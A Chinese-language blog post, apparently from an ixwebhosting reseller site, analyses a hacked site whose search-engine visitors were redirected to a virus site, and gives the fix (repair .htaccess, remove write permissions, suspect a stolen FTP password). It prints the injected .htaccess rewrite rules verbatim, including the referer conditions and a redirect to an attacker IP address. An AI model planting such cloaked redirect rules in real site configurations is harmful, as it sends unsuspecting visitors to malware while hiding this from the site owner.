實例解決ixwebhosting的安全問題

安全問題是互聯網十分關註的焦點,在以前也介紹過ixwebhosting空間的安全性是很有保障的。它自身的偵察能力和維護能力都是很強的,但在現實中很可能會遇到很棘手的問題。今天就和大傢從實例中來分析解決一個棘手的問題。

具體情況:當直接進入網站沒有問題,但從google等國外著名搜索引擎進入網站就會轉向到一個病毒網站。如下圖:

分析原因: 網站的.htaccess文件被修改,會加入如下代碼:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

上面的代碼就是判斷訪問者來源,如果是來自上面那些搜索引擎,就自動轉向。

解決辦法: 修正.htaccess,並且去掉.htaccess的寫入權限。同時修正根目錄的權限,去掉寫入權限。

接到IX官方的信息,此安全隱患已經得到修正,他們也殺掉瞭服務器上大部分此類病毒,如果還有問題,請聯系ixwebhosting檢查。被感染的原因可能是由於你的ftp密碼被盜,進而被修改網站文件。

本文來源於ixwebhosting中文導購http://www.ixwebhosting.bz,轉載須註明。

互聯網安全一直是很多人研究的事情,在日益蓬勃的網絡世界,發現問題,分析問題,解決問題是我們一直慣用的模式。所以,像IX這樣棘手的問題沿著思路走。